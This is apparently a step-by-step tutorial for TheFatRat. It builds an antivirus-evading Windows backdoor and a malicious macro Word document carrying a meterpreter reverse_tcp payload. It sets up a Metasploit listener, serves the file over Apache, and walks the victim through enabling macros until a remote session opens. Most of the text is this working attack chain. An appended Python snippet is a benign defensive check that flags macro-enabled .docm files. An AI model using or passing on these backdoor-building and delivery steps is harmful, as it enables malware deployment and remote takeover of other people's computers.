TheFatRat is an exploitation tool that compiles malware with well-known payloads; the compiled malware can then be executed on Linux, Windows, Mac and Android. TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus systems.
Official Repository: https://github.com/Screetsec/TheFatRat
cd /opt
git clone https://github.com/Screetsec/TheFatRat.git
chmod -R 755 /opt/TheFatRat/
cd TheFatRat/
./setup.sh
An "Updating Kali Repo" xterm window will pop up.
After the installation is complete, in the Terminal, type fatrat and hit Enter.
When FatRat launches, it verifies the installed dependencies and shows several prompts; press Enter at each one to continue.
On the FatRat menu, choose [06] Create Fud Backdoor 1000% with PwnWinds [Excelent] by typing 6.
When the PwnWinds menu appears, choose [3] Create exe file with apache + Powershell (FUD 100%) by typing 3 in the menu.
Set the LHOST IP to your Kali IP, LPORT to 4444 and the output to payload.
Next, choose [3] windows/meterpreter/reverse_tcp by typing 3.
If everything works, fatrat will generate a payload.exe file located in /root/Fatrat_Generated/ as shown below:
Backdoor Saved To : /root/Fatrat_Generated/payload.exe
Go back to the main menu by choosing [9] Back to menu.
On the main menu, choose [07] Create Backdoor For Office with Microsploit.
On the Microsploit menu, choose [2] The Microsoft Office Macro on Windows by typing 2.
LHOST IP: [Your Kali IP]
LPORT: 4444
Enter the base name for output files: EvilDoc
Enter the message for the document body: you have been PWNED :)
y for yes.
3.
Navigate to the output folder of FatRat and you will see the generated Word file.
Open another Terminal window and launch metasploit by typing: msfconsole
Select the multi/handler:
use multi/handler
Set the payload to meterpreter/reverse_tcp:
set payload windows/meterpreter/reverse_tcp
Set the LHOST to your Kali IP and LPORT to 4444:
set LHOST 10.0.2.42
set LPORT 4444
Type run to start the listener:
run
To share the malicious file with the Windows machine, copy the Doc file to the apache folder. Open a new Terminal window and type:
cp /root/Fatrat_Generated/EvilDoc.docm /var/www/html/share/
Then, start the apache service:
service apache2 start
Switch to your Windows machine and open the browser.
Type the URL (based on your Kali IP):
http://10.0.2.42/share/
Then, download the malicious doc that you generated.
Open the downloads folder and click the MS Word file.
MS Word opens the file in Protected View. Click Enable Editing.
If you get the SECURITY WARNING because of the macros, click Enable Content.
Now switch back to Kali; if everything works, you will find that you have a Meterpreter session open in the Metasploit terminal.
Now you can view the exploited system details and so on. Informally you can call this action ‘profit’ :)
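Seen from the defending side, the .docm delivered above can be flagged before a user ever reaches the Enable Content prompt, because a macro-enabled Word file is a ZIP container that holds a word/vbaProject.bin part and declares a macroEnabled content type. The following is an added example, not part of the original walkthrough or of TheFatRat; the function names and the sample files are constructed for illustration.

```python
import io
import zipfile

# Indicators that separate a macro-enabled Word document (.docm) from a plain .docx.
VBA_PART = "word/vbaProject.bin"
MACRO_CT = b"application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_CT = b"application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"


def inspect_word_file(data: bytes) -> dict:
    """Report whether an OOXML Word file carries a VBA macro project."""
    result = {"is_ooxml": False, "has_vba_part": False, "macro_content_type": False}
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
            if "[Content_Types].xml" not in names:
                return result  # a ZIP, but not an Office Open XML package
            result["is_ooxml"] = True
            result["has_vba_part"] = VBA_PART in names
            result["macro_content_type"] = MACRO_CT in zf.read("[Content_Types].xml")
    except zipfile.BadZipFile:
        pass  # not a ZIP container at all (legacy .doc, unrelated file, ...)
    return result


def should_quarantine(data: bytes) -> bool:
    """Flag on either indicator, judging content rather than the file extension."""
    report = inspect_word_file(data)
    return report["has_vba_part"] or report["macro_content_type"]


def build_sample(macro: bool) -> bytes:
    """Constructed sample: a minimal package with only the parts the check reads."""
    main_ct = MACRO_CT if macro else PLAIN_CT
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    b'<Types><Override PartName="/word/document.xml" ContentType="'
                    + main_ct + b'"/></Types>')
        zf.writestr("word/document.xml", b"<w:document/>")
        if macro:
            zf.writestr(VBA_PART, b"constructed placeholder, not a real VBA project")
    return buf.getvalue()


if __name__ == "__main__":
    for label, macro in (("macro-enabled sample", True), ("plain sample", False)):
        print(label, inspect_word_file(build_sample(macro)))
```

A mail gateway or download proxy can run the same check on attachments and web downloads and hold any file for which should_quarantine returns True.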